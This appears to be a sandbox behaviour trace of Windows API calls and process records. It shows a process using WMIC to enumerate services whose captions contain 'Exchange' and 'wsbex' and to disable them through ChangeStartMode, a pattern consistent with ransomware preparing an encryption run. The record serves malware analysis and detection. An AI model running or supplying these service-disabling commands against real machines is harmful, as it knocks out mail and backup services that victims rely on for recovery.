0x0 [0116.720] ??0CHString@@QAE@XZ () returned 0xdaf48c [0116.720] GetCurrentThreadId () returned 0xf74 [0116.720] lstrlenA (lpString="") returned 0 [0116.720] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0x1159c70, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0116.721] lstrlenA (lpString="") returned 0 [0116.721] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0x1159c70, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0116.721] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0116.721] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0116.721] wcstok (in: _String="Select * from Win32_Service", _Delimiter=" ", _Context=0x337ff0e8 | out: _String="Select", _Context=0x337ff0e8) returned="Select" [0116.721] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x337ff0e8 | out: _String=0x0, _Context=0x337ff0e8) returned="*" [0116.721] lstrlenW (lpString="FROM") returned 4 [0116.721] lstrlenW (lpString="*") returned 1 [0116.721] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0116.721] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x337ff0e8 | out: _String=0x0, _Context=0x337ff0e8) returned="from" [0116.721] lstrlenW (lpString="FROM") returned 4 [0116.721] lstrlenW (lpString="from") returned 4 [0116.721] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0116.721] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x337ff0e8 | out: _String=0x0, _Context=0x337ff0e8) returned="Win32_Service" [0116.721] lstrlenA (lpString="SELECT * FROM ") returned 14 [0116.721] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x130431c, cbMultiByte=-1, lpWideCharStr=0x1159c70, cchWideChar=15 | out: lpWideCharStr="SELECT * FROM ") returned 15 [0116.721] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0116.721] SysStringLen (param_1="Win32_Service") returned 0xd [0116.721] lstrlenA (lpString=" WHERE ") returned 7 [0116.721] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1303770, cbMultiByte=-1, lpWideCharStr=0x1158dd0, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8 [0116.721] SysStringLen (param_1=" WHERE ") returned 0x7 [0116.721] SysStringLen (param_1="caption LIKE '%Exchange%'") returned 0x19 [0116.721] SysStringLen (param_1="SELECT * FROM Win32_Service") returned 0x1b [0116.721] SysStringLen (param_1=" WHERE caption LIKE '%Exchange%'") returned 0x20 [0116.722] IWbemServices:ExecQuery (in: This=0xf209a0, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Service WHERE caption LIKE '%Exchange%'", lFlags=48, pCtx=0x0, ppEnum=0xdaf494 | out: ppEnum=0xdaf494*=0xf48670) returned 0x0 [0116.728] CoSetProxyBlanket (pProxy=0xf48670, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0116.729] IEnumWbemClassObject:Next (in: This=0xf48670, lTimeout=-1, uCount=0x1, apObjects=0xdaf498, puReturned=0xdaf484 | out: apObjects=0xdaf498*=0xf4a498, puReturned=0xdaf484*=0x1) returned 0x0 [0117.126] IWbemClassObject:Get (in: This=0xf4a498, wszName="__PATH", lFlags=0, pVal=0xdaf45c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xdaf45c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\LHNIWSJ\\ROOT\\CIMV2:Win32_Service.Name=\"vmickvpexchange\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0117.126] ??0CHString@@QAE@XZ () returned 0xdaf408 [0117.126] GetCurrentThreadId () returned 0xf74 [0117.126] LoadStringW (in: hInstance=0x0, uID=0xb7ea, lpBuffer=0xdae3b8, cchBufferMax=1024 | out: lpBuffer="Executing (%1)->%2()\r\n") returned 0x16 [0117.126] FormatMessageW (in: dwFlags=0x2500, lpSource=0xdae3b8, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0xdae3a0, nSize=0x0, Arguments=0xdae3a4 | out: lpBuffer="꘰ô後ô議ĕ") returned 0x5a [0117.126] LocalFree (hMem=0xf4a630) returned 0x0 [0117.126] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Executing (\\\\LHNIWSJ\\ROOT\\CIMV2:Win32_Service.Name=\"vmickvpexchange\")->ChangeStartMode()\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 91 [0117.126] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Executing (\\\\LHNIWSJ\\ROOT\\CIMV2:Win32_Service.Name=\"vmickvpexchange\")->ChangeStartMode()\r\n", cchWideChar=-1, lpMultiByteStr=0x1159c70, cbMultiByte=91, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Executing (\\\\LHNIWSJ\\ROOT\\CIMV2:Win32_Service.Name=\"vmickvpexchange\")->ChangeStartMode()\r\n", lpUsedDefaultChar=0x0) returned 91 [0117.126] ??YCHString@@QAEABV0@PBG@Z () returned 0x13495ec [0117.126] __iob_func () returned 0x77ac1208 [0117.126] fprintf (in: _File=0x77ac1228, _Format="%s" | out: _File=0x77ac1228) returned 90 [0117.135] __iob_func () returned 0x77ac1208 [0117.135] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0117.136] IWbemServices:ExecMethod (in: This=0xf209a0, strObjectPath="\\\\LHNIWSJ\\ROOT\\CIMV2:Win32_Service.Name=\"vmickvpexchange\"", strMethodName="ChangeStartMode", lFlags=0, pCtx=0x0, pInParams=0xf7cba0, ppOutParams=0xdaf418*=0x0, ppCallResult=0x0 | out: ppOutParams=0xdaf418*=0xf4a868, ppCallResult=0x0) returned 0x0 [0117.325] LoadStringW (in: hInstance=0x0, uID=0xb3b3, lpBuffer=0x115b1d0, cchBufferMax=1024 | out: lpBuffer="Method execution successful.\r\n") returned 0x1e [0117.325] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Method execution successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0117.325] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Method execution successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x1159c70, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Method execution successful.\r\n", lpUsedDefaultChar=0x0) returned 31 [0117.325] ??YCHString@@QAEABV0@PBG@Z () returned 0x13495ec [0117.325] __iob_func () returned 0x77ac1208 [0117.325] fprintf (in: _File=0x77ac1228, _Format="%s" | out: _File=0x77ac1228) returned 30 [0117.325] __iob_func () returned 0x77ac1208 [0117.325] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0117.325] IUnknown:AddRef (This=0xf4a868) returned 0x2 [0117.325] ??0CHString@@QAE@XZ () returned 0xdaebac [0117.325] GetCurrentThreadId () returned 0xf74 [0117.325] IWbemClassObject:GetObjectText (in: This=0xf4a868, lFlags=0, pstrObjectText=0xdaebb4 | out: pstrObjectText=0xdaebb4*="\ninstance of __PARAMETERS\n{\n\x09ReturnValue = 0;\n};\n") returned 0x0 [0117.326] LoadStringW (in: hInstance=0x0, uID=0xb7f7, lpBuffer=0x115b1d0, cchBufferMax=1024 | out: lpBuffer="Out Parameters:") returned 0xf [0117.326] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Out Parameters:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0117.326] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Out Parameters:", cchWideChar=-1, lpMultiByteStr=0x1158e18, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Out Parameters:", lpUsedDefaultChar=0x0) returned 16 [0117.326] ??YCHString@@QAEABV0@PBG@Z () returned 0x13495ec [0117.326] __iob_func () returned 0x77ac1208 [0117.326] fprintf (in: _File=0x77ac1228, _Format="%s" | out: _File=0x77ac1228) returned 15 [0117.326] __iob_func () returned 0x77ac1208 [0117.326] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0117.326] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\ninstance of __PARAMETERS\n{\n\x09ReturnValue = 0;\n};\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0117.326] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\ninstance of __PARAMETERS\n{\n\x09ReturnValue = 0;\n};\n", cchWideChar=-1, lpMultiByteStr=0x1159c70, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\ninstance of __PARAMETERS\n{\n\x09ReturnValue = 0;\n};\n", lpUsedDefaultChar=0x0) returned 50 [0117.326] ??YCHString@@QAEABV0@PBG@Z () returned 0x13495ec [0117.326] __iob_func () returned 0x77ac1208 [0117.326] fprintf (in: _File=0x77ac1228, _Format="%s" | out: _File=0x77ac1228) returned 49 [0117.326] __iob_func () returned 0x77ac1208 [0117.326] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0117.326] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0117.326] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=-1, lpMultiByteStr=0x1159c70, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 2 [0117.326] ??YCHString@@QAEABV0@PBG@Z () returned 0x13495ec [0117.326] __iob_func () returned 0x77ac1208 [0117.327] fprintf (in: _File=0x77ac1248, _Format="%s" | out: _File=0x77ac1248) returned 1 [0117.327] __iob_func () returned 0x77ac1208 [0117.327] fflush (in: _File=0x77ac1248 | out: _File=0x77ac1248) returned 0 [0117.327] ??1CHString@@QAE@XZ () returned 0x74a66430 [0117.327] IUnknown:Release (This=0xf4a868) returned 0x1 [0117.327] ??1CHString@@QAE@XZ () returned 0x74a66430 [0117.327] IUnknown:Release (This=0xf4a498) returned 0x0 [0117.328] IEnumWbemClassObject:Next (in: This=0xf48670, lTimeout=-1, uCount=0x1, apObjects=0xdaf498, puReturned=0xdaf484 | out: apObjects=0xdaf498*=0x0, puReturned=0xdaf484*=0x0) returned 0x1 [0117.328] IUnknown:Release (This=0xf48670) returned 0x0 [0117.329] ??1CHString@@QAE@XZ () returned 0x74a66430 [0117.330] ??1CHString@@QAE@XZ () returned 0x74a66430 [0117.330] GetCurrentThreadId () returned 0xf74 [0117.330] ??0CHString@@QAE@PBG@Z () returned 0xdaf650 [0117.330] ??YCHString@@QAEABV0@PBG@Z () returned 0xdaf650 [0117.330] lstrlenW (lpString="LIST") returned 4 [0117.330] lstrlenW (lpString="CALL") returned 4 [0117.330] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0117.330] lstrlenW (lpString="ASSOC") returned 5 [0117.330] lstrlenW (lpString="CALL") returned 4 [0117.330] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0117.330] lstrlenW (lpString="GET") returned 3 [0117.330] lstrlenW (lpString="CALL") returned 4 [0117.330] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0117.330] ??1CHString@@QAE@XZ () returned 0x1 [0117.330] IUnknown:Release (This=0xf209a0) returned 0x0 [0117.331] ?Empty@CHString@@QAEXXZ () returned 0x74a66430 [0117.331] _kbhit () returned 0x0 [0117.332] IUnknown:Release (This=0xf4a868) returned 0x0 [0117.332] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0117.332] WbemLocator:IUnknown:Release (This=0xf034c8) returned 0x2 [0117.332] IUnknown:Release (This=0xf20c20) returned 0x0 [0117.332] IUnknown:Release (This=0xf207c0) returned 0x0 [0117.332] WbemLocator:IUnknown:Release (This=0xf034c8) returned 0x1 [0117.332] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0117.332] WbemLocator:IUnknown:Release (This=0xf034c8) returned 0x0 [0117.333] CoUninitialize () [0117.348] exit (_Code=0) [0117.348] ??1CHString@@QAE@XZ () returned 0x74a66430 [0117.348] ??1CHString@@QAE@XZ () returned 0x74a66430 Thread: id = 271 os_tid = 0xf78 Thread: id = 272 os_tid = 0xf7c Thread: id = 273 os_tid = 0xf80 Thread: id = 274 os_tid = 0xf84 Process: id = "61" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x3405e000" os_pid = "0xf88" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c WMIC SERVICE WHERE 'caption LIKE '%wsbex%'' CALL ChangeStartMode 'Disabled'" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4001 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 4002 start_va = 0x7f0000 end_va = 0x47effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007f0000" filename = "" Region: id = 4003 start_va = 0x47f0000 end_va = 0x480ffff entry_point = 0x0 region_type = private name = "private_0x00000000047f0000" filename = "" Region: id = 4004 start_va = 0x4810000 end_va = 0x4811fff entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 4005 start_va = 0x4820000 end_va = 0x4833fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004820000" filename = "" Region: id = 4006 start_va = 0x4840000 end_va = 0x487ffff entry_point = 0x0 region_type = private name = "private_0x0000000004840000" filename = "" Region: id = 4007 start_va = 0x4880000 end_va = 0x497ffff entry_point = 0x0 region_type = private name = "private_0x0000000004880000" filename = "" Region: id = 4008 start_va = 0x4980000 end_va = 0x4983fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004980000" filename = "" Region: id = 4009 start_va = 0x4990000 end_va = 0x4990fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004990000" filename = "" Region: id = 4010 start_va = 0x49a0000 end_va = 0x49a1fff entry_point = 0x0 region_type = private name = "private_0x00000000049a0000" filename = "" Region: id = 4011 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4012 start_va = 0x7e0c0000 end_va = 0x7e0e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e0c0000" filename = "" Region: id = 4013 start_va = 0x7e0e5000 end_va = 0x7e0e5fff entry_point = 0x0 region_type = private name = "private_0x000000007e0e5000" filename = "" Region: id = 4014 start_va = 0x7e0e7000 end_va = 0x7e0e7fff entry_point = 0x0 region_type = private name = "private_0x000000007e0e7000" filename = "" Region: id = 4015 start_va = 0x7e0ed000 end_va = 0x7e0effff entry_point = 0x0 region_type = private name = "private_0x000000007e0ed000" filename = "" Region: id = 4016 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4017 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4018 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 4019 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4020 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 4021 start_va = 0x4ad0000 end_va = 0x4adffff entry_point = 0x0 region_type = private name = "private_0x0000000004ad0000" filename = "" Region: id = 4022 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4023 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4024 start_va = 0x4c30000 end_va = 0x4d2ffff entry_point = 0x0 region_type = private name = "private_0x0000000004c30000" filename = "" Region: id = 4025 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4066 start_va = 0x47f0000 end_va = 0x47fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000047f0000" filename = "" Region: id = 4067 start_va = 0x49b0000 end_va = 0x4a6dfff entry_point = 0x49b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4068 start_va = 0x4a70000 end_va = 0x4aaffff entry_point = 0x0 region_type = private name = "private_0x0000000004a70000" filename = "" Region: id = 4069 start_va = 0x4ae0000 end_va = 0x4bdffff entry_point = 0x0 region_type = private name = "private_0x0000000004ae0000" filename = "" Region: id = 4070 start_va = 0x4ec0000 end_va = 0x4ecffff entry_point = 0x0 region_type = private name = "private_0x0000000004ec0000" filename = "" Region: id = 4071 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4072 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4073 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4074 start_va = 0x7dfc0000 end_va = 0x7e0bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007dfc0000" filename = "" Region: id = 4075 start_va = 0x7e0ea000 end_va = 0x7e0ecfff entry_point = 0x0 region_type = private name = "private_0x000000007e0ea000" filename = "" Region: id = 4076 start_va = 0x4800000 end_va = 0x4803fff entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 4077 start_va = 0x4810000 end_va = 0x4813fff entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 4078 start_va = 0x4ed0000 end_va = 0x5206fff entry_point = 0x4ed0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 275 os_tid = 0xf8c [0117.535] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0117.535] __set_app_type (_Type=0x1) [0117.535] __p__fmode () returned 0x77ac4d6c [0117.535] __p__commode () returned 0x77ac5b1c [0117.535] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0117.535] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0117.536] GetCurrentThreadId () returned 0xf8c [0117.536] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf8c) returned 0x84 [0117.536] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0117.536] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0117.536] SetThreadUILanguage (LangId=0x0) returned 0x409 [0117.538] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0117.538] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x497f728 | out: phkResult=0x497f728*=0x0) returned 0x2 [0117.538] VirtualQuery (in: lpAddress=0x497f72f, lpBuffer=0x497f6e0, dwLength=0x1c | out: lpBuffer=0x497f6e0*(BaseAddress=0x497f000, AllocationBase=0x4880000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0117.538] VirtualQuery (in: lpAddress=0x4880000, lpBuffer=0x497f6e0, dwLength=0x1c | out: lpBuffer=0x497f6e0*(BaseAddress=0x4880000, AllocationBase=0x4880000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0117.538] VirtualQuery (in: lpAddress=0x4881000, lpBuffer=0x497f6e0, dwLength=0x1c | out: lpBuffer=0x497f6e0*(BaseAddress=0x4881000, AllocationBase=0x4880000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0117.538] VirtualQuery (in: lpAddress=0x4883000, lpBuffer=0x497f6e0, dwLength=0x1c | out: lpBuffer=0x497f6e0*(BaseAddress=0x4883000, AllocationBase=0x4880000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0117.538] VirtualQuery (in: lpAddress=0x4980000, lpBuffer=0x497f6e0, dwLength=0x1c | out: lpBuffer=0x497f6e0*(BaseAddress=0x4980000, AllocationBase=0x4980000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0117.538] GetConsoleOutputCP () returned 0x1b5 [0117.539] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0117.539] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0117.539] _get_osfhandle (_FileHandle=1) returned 0x3c [0117.539] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0117.539] _get_osfhandle (_FileHandle=1) returned 0x3c [0117.539] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0117.539] _get_osfhandle (_FileHandle=1) returned 0x3c [0117.539] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0117.539] _get_osfhandle (_FileHandle=0) returned 0x38 [0117.539] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0117.540] _get_osfhandle (_FileHandle=0) returned 0x38 [0117.540] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0117.540] GetEnvironmentStringsW () returned 0x4c37e00* [0117.540] FreeEnvironmentStringsA (penv="A") returned 1 [0117.540] GetEnvironmentStringsW () returned 0x4c37e00* [0117.540] FreeEnvironmentStringsA (penv="A") returned 1 [0117.540] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x497e68c | out: phkResult=0x497e68c*=0x94) returned 0x0 [0117.540] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x497e690, lpData=0x497e698, lpcbData=0x497e694*=0x1000 | out: lpType=0x497e690*=0x0, lpData=0x497e698*=0x38, lpcbData=0x497e694*=0x1000) returned 0x2 [0117.540] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x497e690, lpData=0x497e698, lpcbData=0x497e694*=0x1000 | out: lpType=0x497e690*=0x4, lpData=0x497e698*=0x1, lpcbData=0x497e694*=0x4) returned 0x0 [0117.540] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x497e690, lpData=0x497e698, lpcbData=0x497e694*=0x1000 | out: lpType=0x497e690*=0x0, lpData=0x497e698*=0x1, lpcbData=0x497e694*=0x1000) returned 0x2 [0117.540] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x497e690, lpData=0x497e698, lpcbData=0x497e694*=0x1000 | out: lpType=0x497e690*=0x4, lpData=0x497e698*=0x0, lpcbData=0x497e694*=0x4) returned 0x0 [0117.540] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x497e690, lpData=0x497e698, lpcbData=0x497e694*=0x1000 | out: lpType=0x497e690*=0x4, lpData=0x497e698*=0x40, lpcbData=0x497e694*=0x4) returned 0x0 [0117.540] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x497e690, lpData=0x497e698, lpcbData=0x497e694*=0x1000 | out: lpType=0x497e690*=0x4, lpData=0x497e698*=0x40, lpcbData=0x497e694*=0x4) returned 0x0 [0117.540] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x497e690, lpData=0x497e698, lpcbData=0x497e694*=0x1000 | out: lpType=0x497e690*=0x0, lpData=0x497e698*=0x40, lpcbData=0x497e694*=0x1000) returned 0x2 [0117.540] RegCloseKey (hKey=0x94) returned 0x0 [0117.540] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x497e68c | out: phkResult=0x497e68c*=0x94) returned 0x0 [0117.540] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x497e690, lpData=0x497e698, lpcbData=0x497e694*=0x1000 | out: lpType=0x497e690*=0x0, lpData=0x497e698*=0x40, lpcbData=0x497e694*=0x1000) returned 0x2 [0117.540] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x497e690, lpData=0x497e698, lpcbData=0x497e694*=0x1000 | out: lpType=0x497e690*=0x4, lpData=0x497e698*=0x1, lpcbData=0x497e694*=0x4) returned 0x0 [0117.540] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x497e690, lpData=0x497e698, lpcbData=0x497e694*=0x1000 | out: lpType=0x497e690*=0x0, lpData=0x497e698*=0x1, lpcbData=0x497e694*=0x1000) returned 0x2 [0117.541] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x497e690, lpData=0x497e698, lpcbData=0x497e694*=0x1000 | out: lpType=0x497e690*=0x4, lpData=0x497e698*=0x0, lpcbData=0x497e694*=0x4) returned 0x0 [0117.541] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x497e690, lpData=0x497e698, lpcbData=0x497e694*=0x1000 | out: lpType=0x497e690*=0x4, lpData=0x497e698*=0x9, 